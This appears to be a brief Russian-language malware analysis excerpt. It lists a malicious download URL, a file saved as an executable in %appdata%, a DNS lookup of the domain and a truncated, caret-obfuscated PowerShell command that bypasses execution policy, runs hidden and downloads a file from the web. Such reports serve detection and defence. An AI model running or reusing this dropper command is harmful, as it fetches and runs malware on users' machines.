Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^w^E^r^SHE^L^l.ex^e^ -eXeC^ut^I^onp^o^LiCy^ bYPaSS ^-N^OpR^oF^I^L^e -WindOw^StYL^e ^HI^d^DE^N ^(^New-^Ob^jEcT^ Sy^ST^em.n^E^T^.^w^e^b^CLie^n^T)^.d^Own^lOAdf^Ile('http:...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "p^O^w^E^r^SHE^L^l.ex^e^ -eXeC^ut^I^onp^o^LiCy^ bYPaSS ^-N^OpR^oF^I^L^e -WindOw^StYL^e ^HI^d^DE^N ^(^New-^Ob^jEcT^ Sy^ST^em.n^E^T^.^w^e^b^CLie^n^T)^.d^Own^lOAdf^Ile('http:...' (со скрытым окном)